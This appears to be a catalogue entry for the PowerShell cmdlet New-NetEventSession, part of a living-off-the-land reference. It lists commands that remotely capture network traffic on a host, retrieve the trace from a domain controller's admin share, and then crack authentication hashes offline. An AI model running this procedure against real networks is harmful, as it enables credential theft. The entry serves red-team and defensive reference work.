New-NetEventSession

Creates a network event session


Functions:
Type:
Toolsets:

Resources

Network

Sniff traffic

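# $s is an existing CIM session to the remote host (its creation is not shown on this page)
# Create a capture session that writes to an ETL file on the remote host
New-NetEventSession -Name sess -CimSession $s -LocalFilePath "C:\Windows\Temp\Trace.etl" -CaptureMode SaveToFile
# Attach the packet capture provider to the session
Add-NetEventPacketCaptureProvider -SessionName sess -CimSession $s -Level 4 -CaptureType Physical
# Start the capture and check the session status
Start-NetEventSession -Name sess -CimSession $s
Get-NetEventSession -Name sess -CimSession $s

# Stop and remove the session, then retrieve the trace file over the admin share
Stop-NetEventSession -Name sess -CimSession $s
Remove-NetEventSession -Name sess -CimSession $s
Move-Item \\DC1.ad.bitsadmin.com\C$\Windows\Temp\Trace.etl C:\tmp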
Usecase
Sniff authentication traffic on a domain controller and locally crack the hashes

Comments
MITRE ATT&CK
T1047




Updated: 2023-07-01
Contributor: Arris Huijgen (bitsadmin)